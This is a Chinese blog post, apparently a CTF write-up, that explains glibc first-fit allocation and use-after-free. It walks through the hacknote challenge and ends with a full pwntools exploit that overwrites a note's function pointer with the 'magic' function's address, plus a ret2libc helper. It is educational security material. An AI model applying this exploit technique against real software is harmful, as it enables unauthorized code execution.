first_fit&UAF(heap)

已于 2022-07-14 16:58:49 修改
阅读量247 收藏
点赞数
分类专栏: PWN 文章标签: pwn heap
于 2021-06-21 00:50:52 首次发布
cctrl
本文链接:https://blog.csdn.net/weixin_44309300/article/details/118077056
版权
本文深入探讨了内存管理中的first_fit算法和使用未初始化指针(Use-After-Free,UAF)的安全风险。通过实例分析了first_fit如何在chunk释放后可能引发的问题,以及在特定情况下如何被利用。同时,文章通过攻防世界的hacknote案例展示了UAF漏洞的利用过程,包括堆分配、释放和重新分配的细节,以及如何构造payload实现攻击。
摘要由CSDN通过智能技术生成

first_fit&UAF

first_fit原理

堆管理器对free的chunk未完全回收,当再次调用malloc时,会分配先前已经有内容的chunk。
大致流程如下图,但需要避免一些对管理器的检测机制(在一定限制条件下)
在这里插入图片描述

实例分析原理

下面看个demo调试,验证上面情况。

#include<stdio.h>
#include<stdlib.h>
#include<string.h>


int main()
{
	char *p = (char *)malloc(10);

	strcpy(p,"hello");
	
	free(p);
	//常常未把p=null,置NULL导致被利用

	printf("%s\n",p);

	return 0;
}

malloc后返回的地址p = 0x003807b8(内容就是屯屯屯…)
在这里插入图片描述
执行strcpy后,内存空间内容被改变

在这里插入图片描述
free后
在这里插入图片描述
总结:指针P指向位置一直都没变,如果再次分配获得这块内容,就可以产生一些有趣的操作。(这是windows环境中跑的,linux环境给出下面验证代码参考)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main()
{
	fprintf(stderr, "This file doesn't demonstrate an attack, but shows the nature of glibc's allocator.\n");
	fprintf(stderr, "glibc uses a first-fit algorithm to select a free chunk.\n");
	fprintf(stderr, "If a chunk is free and large enough, malloc will select this chunk.\n");
	fprintf(stderr, "This can be exploited in a use-after-free situation.\n");

	fprintf(stderr, "Allocating 2 buffers. They can be large, don't have to be fastbin.\n");
	char* a = malloc(0x512);
	char* b = malloc(0x256);
	char* c;

	fprintf(stderr, "1st malloc(0x512): %p\n", a);
	fprintf(stderr, "2nd malloc(0x256): %p\n", b);
	fprintf(stderr, "we could continue mallocing here...\n");
	fprintf(stderr, "now let's put a string at a that we can read later \"this is A!\"\n");
	strcpy(a, "this is A!");
	fprintf(stderr, "first allocation %p points to %s\n", a, a);

	fprintf(stderr, "Freeing the first one...\n");
	free(a);

	fprintf(stderr, "We don't need to free anything again. As long as we allocate smaller than 0x512, it will end up at %p\n", a);

	fprintf(stderr, "So, let's allocate 0x500 bytes\n");
	c = malloc(0x500);
	fprintf(stderr, "3rd malloc(0x500): %p\n", c);
	fprintf(stderr, "And put a different string here, \"this is C!\"\n");
	strcpy(c, "this is C!");
	fprintf(stderr, "3rd allocation %p points to %s\n", c, c);
	fprintf(stderr, "first allocation %p points to %s\n", a, a);
	fprintf(stderr, "If we reuse the first allocation, it now holds the data from the third allocation.\n");
}

UAF实例

例题 攻防世界的hacknote

1,拿到先正常流程走下,看看流程
在这里插入图片描述
2,拿进IDA逆向分析一波,主要是上述4个函数功能 (magic是可利用函数)
在这里插入图片描述
3,分析出add结点的结构体大致是一个指针函数和一个content
在这里插入图片描述
4,先添加两个add(0x10)看看堆区分布情况

在这里插入图片描述
观察可得申请一个add(0x10)会产生一个0x18的空间的chunk存放content,而0x10的空间放的是结构体struct自身。绿色成员便是结构体成员,指针函数所指的内容,即函数print_note_content。需要想方设法利用改变的也是此位置。

申请一个空间时内容总结:
1,存放不可改变的结构体空间;
2,存放结构体content内容的空间(利用改变指针函数内容);
在这里插入图片描述

5,释放刚add的两个结点
在这里插入图片描述
(注:重启了一次调试,所以地址不同,0x85a2000对应0x9791000)
利用0x9791000和0x9691028去伪造:
0x9691028当作结构体struct
0x9791000当content内容(first_fit关键,即第一次它本是属于结构体struct,但利用UAF,伪造成了content内容)

顺序解释:
在fastbin[0]中:尾链先分配,即0x9691028(0x85a2028)先出来。在申请add一个节点时,先结构体,再content的顺序分配。(注:这里add(大小)申请节点时,利用大小的方法不唯一,都需要去观察堆的分配情况而定,即能获取到fastbin断链中的地址)

6.再次申请add小于0x10的空间,填充content内容为magic函数地址,利用成功。
在这里插入图片描述
在这里插入图片描述

7.exp

from pwn import  *
from LibcSearcher import LibcSearcher
from sys import argv

def ret2libc(leak, func, path=''):
	if path == '':
		libc = LibcSearcher(func, leak)
		base = leak - libc.dump(func)
		system = base + libc.dump('system')
		binsh = base + libc.dump('str_bin_sh')
	else:
		libc = ELF(path)
		base = leak - libc.sym[func]
		system = base + libc.sym['system']
		binsh = base + libc.search('/bin/sh').next()

	return (system, binsh)

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,'\0'))
uu64    = lambda data               :u64(data.ljust(8,'\0'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

context.log_level = 'DEBUG'
binary = './hacknote'
context.binary = binary
elf = ELF(binary)
p = process('./hacknote')
#p = remote('node3.buuoj.cn',29924) if argv[1]=='r' else process(binary)
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

def dbg():
	gdb.attach(p)
	pause()

# start
def add(size,name='a'):
	sla(':','1')
	sla(':',str(size))
	sla(':',name)

def delete(index):
	sla(':','2')
	sla(':',str(index))

def show(index):
	sla(':','3')
	sla(':',str(index))

magic = p32(elf.sym['magic']) # 0x8048945
add(0x10) # 0
add(0x10) # 1
delete(0)
delete(1)
add(0x8,magic)
show(0)
end
itr()
hercu1iz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
time_formatter-UAF利用
Vicl1fe的博客
10-12 235
time_formatter-UAF利用 版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://blog.csdn.net/qq_39268483/article/details/91552363
内存分配算法,包括first-fit,best-fit
12-28
很详细,很复杂。不过貌似有点小问题,大家可以研究下!
Pwn-Glibc堆利用-FirstFit&UAF浅析
pointerr的博客
10-19 202
0x1 最近忙于堆的学习,在师傅们的指导下,对堆有了一知半解,找了一个网上的UAF题目来练手。 题目链接:https://www.bilibili.com/video/BV1iE411H7cZ (再次感谢大佬发布的教学视频) 先检查一下程序: 发现保护全开。64位,反编译之后发现: 在main函数中看到后门函数cat flag,但是条件是变量值为5。 运行一下: 大概意思是程序可以生成一个creature【堆】,里面包含姓名和等级两个参数数据,并且可以通过输入命令来改变这些变量: After you
Pwn 堆溢出(first_fit篇)
qq_51700257的博客
03-27 397
Pwn how2heap(first_fit篇) 我们先看看first_fit滴代码嗷 我们尝试运行该程序qwq,会出现神奇的情况 哎嘿,我们会发现第三个堆和第一个堆的地址一毛一样,这是为什么呢? 这段代码实际上展示的是堆分配的策略 在分配内存时,malloc会先到fastbin(或者unsorted bin)中查找合适大小的已经被free的chunk,如果没有,就会把unsorted bin中的所有chunk分配到所属于的bins中,然后再去这些bins中寻找合适的chunk。当你使用malloc分配
TIT 操作系统实验三 动态分区(First Fit、Next Fit、Best Fit、Worst Fit )
张时贰的博客
12-09 3183
文章目录实验三 动态分区算法前言实验目的实验内容实验步骤内存分配菜单首次适应算法循环首次适应算法最佳适应算法最坏适应算法内存分配内存回收展示分区主函数完整代码运行结果总结 实验三 动态分区算法 前言 参考教材《操作系统 第四版》汤小丹 首次适应算法(First Fit)。空闲分区以地址递增的次序连接。分配内存时顺序查找,找到大小能满足要求的第一个空闲分区 邻近适应算法(Next Fit)。又称循环首次适应算法,由首次适应算法演变而成。不同之处是,分配内存时从上次查找结束的位置开始继续查找 最
动态分区分配算法(First Fit,Next Fit,Best Fit,Worst Fit)
木牛的博客
06-15 1万+
1.首次适应算法(First Fit)2.循环首次适应算法(Next Fit)3.最佳适应算法(Best Fit)4.最坏适应算法(Worst Fit)1.首次适应算法(First Fit)2.循环首次适应算法(Next Fit) 3.最佳适应算法(Best Fit) 4.最坏适应算法(Worst Fit) 1.首次适应算法(First Fit)2.循环首次适应算法(Next Fit)3.最佳适应算法(Best Fit)4.最坏适应算法(Worst Fit) (488条消息) 动态分
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
标题中的“uaf42.zip_uaf42_uaf42 design_uaf42-data”表明这是一份关于“uaf42”设计的压缩文件,重点在于“uaf42”的设计及其相关数据。描述中提到的是使用“uaf42”设计的有源滤波器,并记录了高通滤波器的设计...
fido-uaf-v1.0-rd-20141008.zip_FIDO UAF1.0Client_U2F_fido uaf1.0
09-19
FIDO U2F协议依赖于一个加强的加密第二...最终用户携带一个简单的U2F设备可以用于任何支持该协议的应用上。用户得到一个通过一个简单的KEY设备得到一个安全的环境。这个文档是对U2F协议和一个阅读详细文当前的概述。
pwn学习】堆溢出(二)- First Fit
Morphy_Amo的博客
01-09 922
glibc堆管理中的First Fit机制
【CTF】【PWN】【UAF】【萌新友好向wp】hitcontraining_uaf
m0_50819561的博客
10-08 390
这题的反编译有点阴间。 这是add函数,add一次会malloc两个chunk。 同时要注意,这里的notelist是一个二维数组。notelist[i]表示的其实是notelist[i][0].后面还有一个notelist[i][1]。 我们看notelist[i],他被赋值为print_note_content这个地址的函数。 notelist[i][1]才是真正存放chunk的content的地方。 为什么要把notelist[i]赋值为print_note_content这个地址的函数呢? 下面这
操作系统分区分配算法first-fit ,next-fit,worse-fit模拟
10-26
1>基于vs2010,文件比较大。 2>在使用代码之前,建议先看一下‘使用说明.txt'.
how2heap-first_fit
fanghuapyk的博客
04-23 191
标题1.first_fit (unsorted bin) first-fit是一个glibc堆管理策略,当程序在分配内存时,malloc会现在first bin或者unsorted bin中查找适合的chunk,如果有适合的chunk,就会直接分配给程序使用,如果没有找到合适的chunk,就会把unsorted bin中的所有chunk放到所属的bins链中去,然后再从这些bins中查找合适的chunk分配给程序, 下面是网上基于64位的程序来做的一个展示,代码如下: #include <stdio.
实例分析首次适应算法、最佳适应算法、最差适应算法
qq_18671205的博客
07-10 4442
关于首次适应算法、最佳适应算法和最差适应算法,先看一下百度百科的解释,已经说出了三者的最大区别。 首次适应算法(first-fit): 从空闲分区表的第一个表目起查找该表,把最先能够满足要求的空闲区分配给作业,这种方法的目的在于减少查找时间。 最佳适应算法(best-fit):从全部空闲区中找出能满足作业要求的,且大小最小的空闲分区,这种方法能使碎片尽量小。 最差适应算法(worst-fit):它从全部空闲区中找出能满足作业要求的、且大小最大的空闲分区,从而使链表中的节点大小...
对比first-fit/best-fit/worst-fit/slab以及buddy这几种算法的特点
热门推荐
Ding 的博客
09-08 3万+
以下均为自己对这些算法的理解: fitst-fit算法 First-fit算法:连续物理内存分配算法的一种,将空闲内存块按照地址从小到大的方式连起来,具体实现时使用了双向链表的方式。当分配内存时,从链表头开始向后找,这意味着从低地址向高地址查找,一旦找到可以满足要求的内存块,即将该内存块分配出去即可。在此处为了避免内部碎片问题,具体实现时我们将该可用内存块分为两部分:前一部分大小与所需内存相同,这...
初探UAF漏洞:2016 HCTF fheap
Vicl1fe的博客
09-21 930
参考链接:CTF_wiki 讨论qq群:946220807,欢迎大佬来指导 UAF 刚学堆,学到了UAF(use after free)漏洞,UAF本质是free后,并没有把指针指向null,导致free后,指针还可被使用。用2016 HCTF fheap来说明一下。题目也在参考链接里。 分析 看到这个程序实现了3个功能,add note,delete not,print note。 在add_...
内存动态分区分配算法
qq_46138755的博客
06-14 8509
所谓动态分区分配,就是指内存在初始时不会划分区域,而是会在进程装入时,根据所要装入的进程大小动态地对内存空间进行划分,以提高内存空间利用率,降低碎片的大小
how2heap注意点总结-上
九层台
03-11 941
1.chunk的申请机制,在申请chunk的时候满足first-fit算法(从unsorted bin中遍历遇到第一个比需要chunk大的chunk切割,然后遍历unsorted bin链对应chunk放入对应位置) (所需chunk大小大于small bin或者small bin中没有找到恰好满足的chunk大小,或者fastbin中没有找到合适的chunk大小会引起fast bins遍历合并放...
首次适应(FirstFit)算法(空闲区地址递增)
斯文败类
09-17 1万+
基本思想:要求空闲区按地址递增的次序排列。当进行内存分配时,从空闲区表头开始顺序查找,直到找到第一个能滿足其大小要求的空闲区为止。分一块给请求者,余下部分仍留在空闲区中。
uaf42有源滤波初始化keil5代码
最新发布
07-28
UAF42是一款通用的有源滤波器集成电路,它通常用于音频信号处理或电源滤波等应用。在Keil5环境下编写其初始化代码,你需要包含相关的头文件,并根据电路设计配置滤波器参数。 以下是一个简化的示例代码,假设你正在使用UAF42作为第二阶低通滤波器: ```c #include "UAF42.h" // 假设这是UAF42库的头文件 // 定义滤波器参数,比如截止频率和阻抗 float cutoffFrequency = 1000; // Hz float impedance = 50; // Ohm void UAF42_Init(void) { // 初始化UAF42 UAF42_SetFilterType(UAF42_LP); // 设置滤波器类型为低通 UAF42_SetCutoff(cutoffFrequency); UAF42_SetImpedance(impedance); // 写入UAF42的寄存器配置 UAF42_WriteReg(UAF42_RCVR1, (uint8_t)UAF42_RCVR1_DEFAULT); // 设置接收器寄存器1 UAF42_WriteReg(UAF42_RCVR2, (uint8_t)UAF42_RCVR2_DEFAULT); // 设置接收器寄存器2 UAF42_WriteReg(UAF42_DAC1, UAF42_DAC1_DEFAULT); // 设置DAC1设置 }
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值